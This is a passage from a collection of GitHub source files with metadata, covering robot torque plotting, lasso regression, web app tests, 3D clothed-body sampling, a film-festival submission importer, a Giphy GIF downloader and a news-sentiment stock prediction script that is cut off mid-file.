FL_thigh_arrow = plt.arrow(0, 0, 0, 0, head_width=0.05, width=0.05, color='b')\n plt.show()\n robot.reset()\n\n input(\"Press Enter to continue...\")\n\n step = 0\n\n while True:\n robot.apply_action(interpolate_next_action(robot, step))\n robot.receive_observation()\n \n joint_torques = robot.get_joint_torques()\n joint_vels = robot.get_joint_qvel()\n FR_thigh_arrow.set_data(dx=joint_torques[1], dy=joint_vels[1])\n FL_thigh_arrow.set_data(dx=joint_torques[4], dy=joint_vels[4])\n \n plt.plot()\n plt.pause(TICK_TIMESTEP)\n step += 1\n except:\n import traceback; traceback.print_exc()\n \n finally:\n print(\"Closing...\")\n robot.close()\n estimator_instance.close()\n plt.close()\n exit(0)", "repo_name": "realquantumcookie/APRL", "sub_path": "tests/test_joint_torques.py", "file_name": "test_joint_torques.py", "file_ext": "py", "file_size_in_byte": 2012, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 35, "dataset": "github-code", "pt": "31", "api": [{"api_name": "rail_walker_interface.Walker3DVelocityEstimator", "line_number": 9, "usage_type": "name"}, {"api_name": "rail_real_walker.robots.Go1RealWalker", "line_number": 12, "usage_type": "name"}, {"api_name": "numpy.sin", "line_number": 13, "usage_type": "call"}, {"api_name": "numpy.pi", "line_number": 13, "usage_type": "attribute"}, {"api_name": "rail_real_walker.robots.Go1RealWalker", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.ion", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 29, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlim", "line_number": 30, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 30, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylim", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.arrow", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.arrow", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.pause", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "traceback.print_exc", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.close", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}]}
+{"seq_id": "43647693112", "text": "# librerias\nimport random\nimport pandas as pd\n# from sklearn.preprocessing import MinMaxScaler\nfrom sklearn.model_selection import train_test_split\n# module\nfrom src.module import (regression_lineal_lasso, graficar_resultados,\n lasso_lars, alpha_lasso_optimization)\n\n\n# cargamos la data ya limpiada\nx = pd.read_excel(\"data/cleaned.xlsx\", index_col=0)\n\ny = x[[\"FIXED_TAX\"]]\nx = x[['ACT_SQFT']]\n\n# Crear objecto scaler\n# scaler = MinMaxScaler(feature_range=(0, 1))\n# # Normalizar\n# x = scaler.fit_transform(x)\n\n# # Guardar objeto scaler\nseed = random.randint(1, 21)\n# Dividir los conjuntos de datos\nx_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2,\n random_state=20)\n\nget_alpha = alpha_lasso_optimization(x, y)\nprint(get_alpha)\n\n# Regresión lineal por lasso\nreg_lasso, mae, coeficientes = regression_lineal_lasso(x_train,\n y_train,\n alpha=get_alpha)\nprint(coeficientes)\nprint(\"MAE\", mae)\ny_pred_lasso = reg_lasso.predict(x_test)\ngraficar_resultados(y_test, y_pred_lasso,\n titulo=f\"Resultados Regresión: LASSO, MAE: {round(mae)}\")\nprint(\"Suma de la predicción\", y_pred_lasso.sum())\nprint(\"Suma de variable real\", y_test.sum())\n\n\n# Regresión lineal por lasso lars\nreg_lars, mae, coeficientes = lasso_lars(x_train, y_train, alpha=get_alpha)\nprint(coeficientes)\ny_pred_lars = reg_lars.predict(x_test)\ngraficar_resultados(y_test, y_pred_lars,\n titulo=f\"Resultados Regresión: LASSO LARS, MAE: {round(mae)}\")\nprint(\"Suma de la predicción\", y_pred_lasso.sum())\nprint(\"Suma de variable real\", y_test.sum())\n", "repo_name": "testing-matheus/testing-al", "sub_path": "answers/4question.py", "file_name": "4question.py", "file_ext": "py", "file_size_in_byte": 1745, "program_lang": "python", "lang": "es", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "31", "api": [{"api_name": "pandas.read_excel", "line_number": 12, "usage_type": "call"}, {"api_name": "random.randint", "line_number": 23, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 25, "usage_type": "call"}, {"api_name": "src.module.alpha_lasso_optimization", "line_number": 28, "usage_type": "call"}, {"api_name": "src.module.regression_lineal_lasso", "line_number": 32, "usage_type": "call"}, {"api_name": "src.module.graficar_resultados", "line_number": 38, "usage_type": "call"}, {"api_name": "src.module.lasso_lars", "line_number": 45, "usage_type": "call"}, {"api_name": "src.module.graficar_resultados", "line_number": 48, "usage_type": "call"}]}
+{"seq_id": "2118876117", "text": "import unittest\nfrom aiohttp.test_utils import unittest_run_loop\nfrom ws.tests.testcase import MyHomeTestCase\n\n\nclass ApplianceTestCase(MyHomeTestCase):\n @unittest_run_loop\n async def test_get(self):\n for collection in self.app.resources.appliances:\n for appliance in self.app.resources.appliances[collection]:\n request = await self.client.request(\n \"GET\", \"/appliance/{}\".format(appliance.name.replace(\" \", \"%20\"))\n )\n assert request.status == 200\n text = await request.text()\n assert appliance.name in text\n\n @unittest_run_loop\n async def test_post(self):\n request = await self.client.request(\n \"POST\",\n \"/appliance/simple%20light\",\n data={\n \"module\": \"home.appliance.light.event.forced\",\n \"klass\": \"Event\",\n \"value\": \"Off\",\n },\n )\n assert request.status == 200\n text = await request.text()\n assert \"simple light\" in text\n assert \"Off\" in text\n\n\nif __name__ == \"__main__\":\n unittest.main()\n", "repo_name": "majamassarini/automate-ws", "sub_path": "ws/tests/test_appliance.py", "file_name": "test_appliance.py", "file_ext": "py", "file_size_in_byte": 1150, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "ws.tests.testcase.MyHomeTestCase", "line_number": 6, "usage_type": "name"}, {"api_name": "aiohttp.test_utils.unittest_run_loop", "line_number": 7, "usage_type": "name"}, {"api_name": "aiohttp.test_utils.unittest_run_loop", "line_number": 18, "usage_type": "name"}, {"api_name": "unittest.main", "line_number": 36, "usage_type": "call"}]}
+{"seq_id": "12946021098", "text": "import numpy as np\nimport copy\nimport os\nimport smplx\nimport torch\nfrom os.path import join, exists\nfrom psbody.mesh import Mesh, MeshViewer, MeshViewers\nfrom lib.utils import filter_cloth_pose\n\nnp.random.seed(123)\n\nclass demo(object):\n def __init__(self, model, name, dataset, data_dir, datadir_root, n_sample, save_obj,\n sample_option='normal', smpl_model_folder='', vis=True):\n self.n_sample = n_sample\n self.sample_option = sample_option\n self.name = name\n self.data_dir = data_dir\n self.datadir_root = datadir_root\n self.model = model\n self.dataset = dataset\n self.save_obj = save_obj\n self.vis = vis\n\n self.smpl_model = smplx.body_models.create(model_type='smpl',\n model_path=smpl_model_folder,\n gender='neutral')\n\n script_dir = os.path.dirname(os.path.realpath(__file__))\n self.clothing_verts_idx = np.load(join(script_dir, 'data', 'clothing_verts_idx.npy'))\n self.ref_mesh = Mesh(filename=join(script_dir, 'data', 'template_mesh.obj'))\n self.minimal_shape = self.ref_mesh.v\n\n self.rot = np.load(join(script_dir, 'data', 'demo_data', 'demo_pose_params.npz'))['rot'] # 216 dim pose vector\n self.pose = np.load(join(script_dir, 'data', 'demo_data', 'demo_pose_params.npz'))['pose']\n\n train_stats = np.load(join(script_dir, 'data', 'demo_data', 'trainset_stats.npz'))\n self.train_mean = train_stats['mean']\n self.train_std = train_stats['std']\n\n self.results_dir = join(script_dir, 'results', name)\n if not exists(self.results_dir):\n os.makedirs(self.results_dir)\n\n def sample_vary_pose(self):\n '''\n fix clothing type, sample sevearl poses, under each pose sample latent code N times\n '''\n full_pose = self.pose # take the corresponding full 72-dim pose params, for later reposing\n rot = filter_cloth_pose(self.rot) # only keep pose params from clo-related joints; then take one pose instance\n clotype = np.array([1, 0, 0, 0]) # one-hot clothing type label\n clotype_repeated = np.repeat(clotype[np.newaxis, :], len(rot), axis=0)\n\n # get latent embedding of the conditions\n pose_emb, clotype_emb = self.model.encode_only_condition(rot, clotype_repeated)\n clotype_emb = clotype_emb[0]\n\n obj_dir = join(self.results_dir, 'sample_vary_pose')\n\n print('\\n=============== Running demo: fix z, clotype, change pose ===============')\n print('\\nFound {} different pose, for each we generate {} samples\\n'.format(len(rot), self.n_sample))\n\n # sample latent space\n z_samples = np.random.normal(loc=0.0, scale=1.0, size=(self.n_sample, self.model.nz))\n\n for idx, pose_emb_i in enumerate(pose_emb):\n full_pose_repeated = np.repeat(full_pose[np.newaxis, idx, :], self.n_sample, axis=0)\n # concat z with conditions\n z_sample_c = np.array([np.concatenate([sample.reshape(1, -1), pose_emb_i.reshape(1, -1), clotype_emb.reshape(1, -1)], axis=1)\n for sample in z_samples]).reshape(self.n_sample, -1)\n\n predictions = self.model.decode(z_sample_c, cond=pose_emb_i.reshape(1, -1), cond2=clotype_emb.reshape(1, -1))\n predictions = predictions * self.train_std + self.train_mean\n\n # exclude head, fingers and toes\n disp_masked = np.zeros_like(predictions)\n disp_masked[:, self.clothing_verts_idx, :] = predictions[:, self.clothing_verts_idx, :]\n\n predictions_fullbody = disp_masked + self.minimal_shape\n\n predictions_fullbody_posed = self.pose_result_onepose_multisample(predictions_fullbody, full_pose_repeated, pose_idx=idx,\n save_obj=self.save_obj, obj_dir=obj_dir)\n if self.vis:\n minimal_shape_posed = self.pose_result_onepose_multisample(np.array([self.minimal_shape]), full_pose_repeated, pose_idx=idx,\n save_obj=False)\n self.vis_meshviewer(mesh1=predictions_fullbody_posed, mesh2=minimal_shape_posed, mesh3=None,\n n_sample=self.n_sample, titlebar='Sample vary pose')\n\n def vis_meshviewer(self, mesh1, mesh2, mesh3, n_sample, titlebar='titlebar', disp_value=False, values_to_disp=None):\n from psbody.mesh import Mesh, MeshViewer, MeshViewers\n\n if mesh3 is not None:\n viewer = MeshViewers(shape=(1, 3), titlebar=titlebar)\n for x in range(n_sample):\n viewer[0][0].static_meshes = [Mesh(mesh1[x], self.ref_mesh.f)]\n viewer[0][1].static_meshes = [Mesh(mesh2[x], self.ref_mesh.f)]\n viewer[0][2].static_meshes = [Mesh(mesh3[x], self.ref_mesh.f)]\n if disp_value is False:\n input('frame {}, Press key for next'.format(x))\n else:\n input('Current value: {}'.format(values_to_disp[x]))\n else:\n viewer = MeshViewers(shape=(1, 2), titlebar=titlebar)\n for x in range(n_sample):\n viewer[0][0].static_meshes = [Mesh(mesh1[x], self.ref_mesh.f)]\n viewer[0][1].static_meshes = [Mesh(mesh2[x], self.ref_mesh.f)]\n if disp_value is False:\n input('frame {}, press key for next'.format(x))\n else:\n input('Current value: {}'.format(values_to_disp[x]))\n\n def pose_result(self, verts, pose_params, save_obj, cloth_type=None, obj_dir=None):\n '''\n :param verts: [N, 6890, 3]\n :param pose_params: [N, 72]\n '''\n if verts.shape[0] != 1: # minimal shape: pose it to every pose\n assert verts.shape[0] == pose_params.shape[0] # otherwise the number of results should equal the number of pose identities\n\n verts_posed = []\n\n if save_obj:\n if not exists(obj_dir):\n os.makedirs(obj_dir)\n print('saving results as .obj files to {}...'.format(obj_dir))\n\n if verts.shape[0] == 1:\n self.smpl_model.v_template[:] = torch.from_numpy(verts[0])\n for i in range(len(pose_params)):\n # model.pose[:] = pose_params[i]\n self.smpl_model.body_pose[:] = torch.from_numpy(pose_params[i][3:])\n self.smpl_model.global_orient[:] = torch.from_numpy(pose_params[i][:3])\n verts_out = self.smpl_model().vertices.detach().cpu().numpy()\n verts_posed.append(verts_out)\n if save_obj:\n if cloth_type is not None:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, '{}_{:0>4d}.obj').format(cloth_type, i))\n else:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, '{:0>4d}.obj').format(i))\n else:\n for i in range(len(verts)):\n self.smpl_model.v_template[:] = torch.from_numpy(verts[i])\n self.smpl_model.body_pose[:] = torch.from_numpy(pose_params[i][3:])\n self.smpl_model.global_orient[:] = torch.from_numpy(pose_params[i][:3])\n verts_out = self.smpl_model().vertices.detach().cpu().numpy()\n verts_posed.append(verts_out)\n if save_obj:\n if cloth_type is not None:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, '{}_{:0>4d}.obj').format(cloth_type, i))\n else:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, '{:0>4d}.obj').format(i))\n\n return verts_posed\n\n def pose_result_onepose_multisample(self, verts, pose_params, pose_idx, save_obj, obj_dir=None):\n '''\n :param verts: [N, 6890, 3]\n :param pose_params: [N, 72]\n '''\n if verts.shape[0] != 1: # minimal shape: pose it to every pose\n assert verts.shape[0] == pose_params.shape[0] # otherwise the number of results should equal the number of pose identities\n\n verts_posed = []\n\n if save_obj:\n if not exists(obj_dir):\n os.makedirs(obj_dir)\n print('saving results as .obj files to {}...'.format(obj_dir))\n\n if verts.shape[0] == 1:\n self.smpl_model.v_template[:] = torch.from_numpy(verts[0])\n for i in range(len(pose_params)):\n self.smpl_model.body_pose[:] = torch.from_numpy(pose_params[i][3:])\n self.smpl_model.global_orient[:] = torch.from_numpy(pose_params[i][:3])\n verts_out = self.smpl_model().vertices.detach().cpu().numpy()\n verts_posed.append(verts_out)\n if save_obj:\n Mesh(verts_out, self.smpl_model.faces).write_obj(join(obj_dir, 'pose{}_{:0>4d}.obj').format(pose_idx, i))\n\n else:\n for i in range(len(verts)):\n self.smpl_model.v_template[:] = torch.from_numpy(verts[i])\n self.smpl_model.body_pose[:] = torch.from_numpy(pose_params[i][3:])\n self.smpl_model.global_orient[:] = torch.from_numpy(pose_params[i][:3])\n verts_out = self.smpl_model().vertices.detach().cpu().numpy()\n verts_posed.append(verts_out)\n if save_obj:\n Mesh(verts_out.squeeze(), self.smpl_model.faces).write_obj(join(obj_dir, 'pose{}_{:0>4d}.obj').format(pose_idx, i))\n\n return verts_posed\n\n\n def run(self):\n self.sample_vary_pose()\n\n", "repo_name": "yuxwind/CAPE", "sub_path": "demos.py", "file_name": "demos.py", "file_ext": "py", "file_size_in_byte": 9752, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "31", "api": [{"api_name": "numpy.random.seed", "line_number": 10, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 10, "usage_type": "attribute"}, {"api_name": "smplx.body_models.create", "line_number": 25, "usage_type": "call"}, {"api_name": "smplx.body_models", "line_number": 25, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 29, "usage_type": "call"}, {"api_name": "os.path", "line_number": 29, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 30, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 30, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 31, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 31, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 34, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 35, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.load", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 41, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 42, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 43, "usage_type": "call"}, {"api_name": "lib.utils.filter_cloth_pose", "line_number": 50, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 51, "usage_type": "call"}, {"api_name": "numpy.repeat", "line_number": 52, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 52, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 58, "usage_type": "call"}, {"api_name": "numpy.random.normal", "line_number": 64, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 64, "usage_type": "attribute"}, {"api_name": "numpy.repeat", "line_number": 67, "usage_type": "call"}, {"api_name": "numpy.newaxis", "line_number": 67, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros_like", "line_number": 76, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 84, "usage_type": "call"}, {"api_name": "psbody.mesh.MeshViewers", "line_number": 93, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 95, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 96, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 97, "usage_type": "call"}, {"api_name": "psbody.mesh.MeshViewers", "line_number": 103, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 105, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 106, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 123, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 124, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 128, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 131, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 132, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 137, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 137, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 139, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 139, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 142, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 143, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 144, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 149, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 149, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 151, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 166, "usage_type": "call"}, {"api_name": "os.makedirs", "line_number": 167, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 171, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 173, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 174, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 178, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 178, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 182, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 183, "usage_type": "call"}, {"api_name": "torch.from_numpy", "line_number": 184, "usage_type": "call"}, {"api_name": "psbody.mesh.Mesh", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 188, "usage_type": "call"}]}
+{"seq_id": "9047178054", "text": "from collections import namedtuple\n\nfrom datetime import datetime\nfrom django.db import models\n\nfrom submissions.constants import COUNTRIES\nfrom submissions.models import Submission\n\n\nFesthomeData = namedtuple(\n 'FesthomeSubmission',\n ' '.join([\n 'no',\n 'festhome_id',\n 'title',\n 'title_en',\n 'f_E',\n 'length',\n 'f_G',\n 'f_H',\n 'section',\n 'status',\n 'applicant_name',\n 'applicant_lastname',\n 'applicant_date_of_birth',\n 'applicant_code',\n 'applicant_phone',\n 'applicant_email',\n 'applicant_street',\n 'applicant_city',\n 'applicant_postal_code',\n 'applicant_state',\n 'applicant_country',\n 'org_name',\n 'org_email',\n 'org_street',\n 'org_city',\n 'org_postal_code',\n 'org_state',\n 'org_country',\n 'f_AC',\n 'f_AD',\n 'f_AE',\n 'country',\n 'date',\n 'f_AH',\n 'categories',\n 'genre',\n 'theme',\n 'orig_lang',\n 'f_AM',\n 'f_AN',\n 'f_AO',\n 'f_AP',\n 'f_AQ',\n 'f_AR',\n 'synopsis',\n 'f_AT',\n 'f_AU',\n 'f_AV',\n ])\n)\n\n\nCOUNTRIES_DICT = dict((unicode(v), k) for k, v in COUNTRIES)\nCOUNTRIES_DICT['Russia'] = 'RU'\nCOUNTRIES_DICT['United Kingdom'] = 'GB'\nCOUNTRIES_DICT['Macedonia'] = 'MK'\nCOUNTRIES_DICT['United States'] = 'US'\nCOUNTRIES_DICT['Iran'] = 'IR'\nCOUNTRIES_DICT['Montegro'] = 'ME'\nCOUNTRIES_DICT['Serbia'] = 'RS'\nCOUNTRIES_DICT['Kosovo'] = 'RS'\nCOUNTRIES_DICT[u'\\u0411\\u0435\\u043b\\u043e\\u0440\\u0443\\u0441\\u0441\\u0438\\u044f'] = 'BY'\nCOUNTRIES_DICT[u'\\u0420\\u043e\\u0441\\u0441\\u0438\\u044f'] = 'RU'\nCOUNTRIES_DICT[u'\\u0423\\u043a\\u0440\\u0430\\u0438\\u043d\\u0430'] = 'UA'\n\nCOUNTRIES_DICT['SpainUnited Kingdom'] = 'ES'\nCOUNTRIES_DICT['ArgentinaSpain'] = 'AR'\nCOUNTRIES_DICT['SpainUnited States'] = 'ES'\nCOUNTRIES_DICT['CanadaCroatia'] = 'CA'\nCOUNTRIES_DICT['PeruSpain'] = 'PE'\nCOUNTRIES_DICT['GermanyIsrael'] = 'DE'\nCOUNTRIES_DICT['BelgiumFrance'] = 'BE'\nCOUNTRIES_DICT['BrazilPortugal'] = 'BR'\nCOUNTRIES_DICT['Spain (Canary, Ceuta & Melilla)'] = 'ES'\nCOUNTRIES_DICT['BahrainUnited Arab Emirates'] = 'BH'\nCOUNTRIES_DICT['SwitzerlandUnited StatesZambia'] = 'CH'\nCOUNTRIES_DICT['QatarSpain'] = 'QA'\nCOUNTRIES_DICT['Korea, South'] = 'KR'\n\n\nSECTION_DICT = {\n 'Documentary Films': 3,\n}\n\n\nclass FesthomeSubmission(models.Model):\n submission = models.ForeignKey(Submission)\n festhome_id = models.IntegerField(db_index=True)\n\n @classmethod\n def from_data(cls, festhome_data):\n submission = Submission(\n title=festhome_data.title,\n title_en=festhome_data.title_en,\n country=COUNTRIES_DICT.get(festhome_data.country, 'ZZ'),\n section=SECTION_DICT.get(festhome_data.section, 1),\n synopsis=festhome_data.synopsis,\n length=festhome_data.length,\n aspect_ratio=' ',\n year=datetime.strptime(festhome_data.date, '%Y-%m-%d').year,\n premiere=2, # no\n budget=' ',\n attend=0,\n allow_tv=2,\n allow_noncommercial=2,\n allow_network=2,\n backlink=12, # other\n applicant='%s %s' % (\n festhome_data.applicant_name,\n festhome_data.applicant_lastname\n ),\n applicant_email=festhome_data.applicant_email,\n applicant_phone='(%s) %s' % (\n festhome_data.applicant_code,\n festhome_data.applicant_phone\n ),\n applicant_address='%s, %s, %s, %s' % (\n festhome_data.applicant_street,\n festhome_data.applicant_city,\n festhome_data.applicant_state,\n festhome_data.applicant_country\n ),\n director='%s %s' % (\n festhome_data.applicant_name,\n festhome_data.applicant_lastname\n ),\n director_email=festhome_data.applicant_email,\n director_address='%s, %s, %s, %s' % (\n festhome_data.applicant_street,\n festhome_data.applicant_city,\n festhome_data.applicant_state,\n festhome_data.applicant_country\n ),\n comment='Import from Festhome',\n )\n submission.save()\n return cls(\n submission=submission,\n festhome_id=festhome_data.festhome_id\n )\n\n", "repo_name": "kinaklub/filmfest.by", "sub_path": "festhome_import/models.py", "file_name": "models.py", "file_ext": "py", "file_size_in_byte": 4504, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "31", "api": [{"api_name": "collections.namedtuple", "line_number": 10, "usage_type": "call"}, {"api_name": "submissions.constants.COUNTRIES", "line_number": 65, "usage_type": "name"}, {"api_name": "django.db.models.Model", "line_number": 98, "usage_type": "attribute"}, {"api_name": "django.db.models", "line_number": 98, "usage_type": "name"}, {"api_name": "django.db.models.ForeignKey", "line_number": 99, "usage_type": "call"}, {"api_name": "submissions.models.Submission", "line_number": 99, "usage_type": "argument"}, {"api_name": "django.db.models", "line_number": 99, "usage_type": "name"}, {"api_name": "django.db.models.IntegerField", "line_number": 100, "usage_type": "call"}, {"api_name": "django.db.models", "line_number": 100, "usage_type": "name"}, {"api_name": "submissions.models.Submission", "line_number": 104, "usage_type": "call"}, {"api_name": "datetime.datetime.strptime", "line_number": 112, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 112, "usage_type": "name"}]}
+{"seq_id": "6402856960", "text": "import urllib.request\nfrom keys import YOUR_API_KEY\nimport json\nimport os\nimport sys\n\n\n\nif __name__ == \"__main__\":\n to_translate = sys.argv[1]\n results = int(sys.argv[2])\n\n # to_translate = to_translate.replace(\" \", \"+\")\n path = f\"output/translate/{to_translate}\"\n \n if not os.path.isdir(path):\n os.mkdir(path)\n\n print(to_translate)\n\n req = f\"https://api.giphy.com/v1/gifs/translate?api_key={YOUR_API_KEY}&s={to_translate}\"\n\n gif_ids = []\n\n data=json.loads(urllib.request.urlopen(req).read())\n gif_id = data['data']['url']\n\n counter = 0\n\n while len(gif_ids) < results and counter <= 10:\n if gif_id not in gif_ids:\n gif_ids.append(gif_id)\n else:\n data=json.loads(urllib.request.urlopen(req).read())\n gif_id = data['data']['id']\n counter +=1\n\n for i, id in enumerate(gif_ids):\n url = f\"https://media.giphy.com/media/{id}/giphy.gif\"\n print(url,i)\n os.system(f\"curl {url} --output {path}/{to_translate}{i}.gif\")\n \n", "repo_name": "miguelferia/get_gifs", "sub_path": "translategif.py", "file_name": "translategif.py", "file_ext": "py", "file_size_in_byte": 1045, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "32", "api": [{"api_name": "sys.argv", "line_number": 10, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 11, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 16, "usage_type": "call"}, {"api_name": "os.path", "line_number": 16, "usage_type": "attribute"}, {"api_name": "os.mkdir", "line_number": 17, "usage_type": "call"}, {"api_name": "keys.YOUR_API_KEY", "line_number": 21, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 25, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 25, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 25, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 34, "usage_type": "call"}, {"api_name": "urllib.request.request.urlopen", "line_number": 34, "usage_type": "call"}, {"api_name": "urllib.request.request", "line_number": 34, "usage_type": "attribute"}, {"api_name": "urllib.request", "line_number": 34, "usage_type": "name"}, {"api_name": "os.system", "line_number": 41, "usage_type": "call"}]}
+{"seq_id": "36611355197", "text": "# description: This program predicts if the stock price of a company will increase or decrease based on top news headlines\n\n\n# description: this program attempts to optimize a users portfolio using Efficient Frontier\n\n#import the libraries\nimport datetime as dt\nimport matplotlib.pyplot as plt\nimport pandas as pd\nimport numpy as np\nfrom textblob import TextBlob\nimport re\nfrom vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import accuracy_score, classification_report\nfrom sklearn.discriminant_analysis import LinearDiscriminantAnalysis\nplt.style.use('fivethirtyeight')\n\n### import the data ###\n\n#store the data\nValue = pd.read_csv('Value_DJIA.csv')\nNews = pd.read_csv('News_DJIA.csv')\n\n#Show the first three rows of the news\n\n\n#Merge the data set on the date field\nmerge = News.merge(Value, how='inner', on='Date', left_index = True)\n\n#Combine all of the news headlines into one column\nheadlines = []\nfor row in range(0,len(merge.index)):\n headlines.append(' '.join(str(x) for x in merge.iloc[row, 2:27]))\n\n#print a sample of the combined headlines\n\n#this data set is kinda dirty so lets clean it up\n###Clean Data###\nclean_headlines = []\nfor i in range(0, len(headlines)):\n clean_headlines.append(re.sub(\"b[('\\\\\\\")]\", '', headlines[i])) #remove b'\n\n#Add the clean headlines to the merge data set\nmerge['Combined_News'] = clean_headlines\nmerge.reset_index(inplace=True)\n#Show the new column\npd.set_option('display.max_columns',37) ##show all Columns\n\n\n#Create a function to get the subjectivity\ndef getSubjectivity(text):\n return TextBlob(text).sentiment.subjectivity\n\n#Create a function to get the polarity\ndef getPolarity(text):\n return TextBlob(text).sentiment.polarity\n\n#Create two new columns 'Subjectivity' and 'Polarity'\nmerge['Subjectivity'] = merge['Combined_News'].apply(getSubjectivity)\nmerge['Polarity'] = merge['Combined_News'].apply(getPolarity)\n\n#Show the new data columns in the merge data set\n#print(merge.head)\n\n#Create a function to get the sentimenet scores\ndef getSentimentIntensityAnalyzer(text):\n sia = SentimentIntensityAnalyzer()\n sentiment = sia.polarity_scores(text)\n return sentiment\n\n#Get the sentiment scores for each day\ncompound = [] ## a metric that calculates the sums of all the lexicon ratings which have been normalized over (-1,1)\nneg = []\npos = []\nneu = []\nSIA = 0\n\nfor i in range (0, len(merge['Combined_News'])):\n SIA = getSentimentIntensityAnalyzer(merge['Combined_News'][i])\n compound.append(SIA['compound'])\n neg.append(SIA['neg'])\n 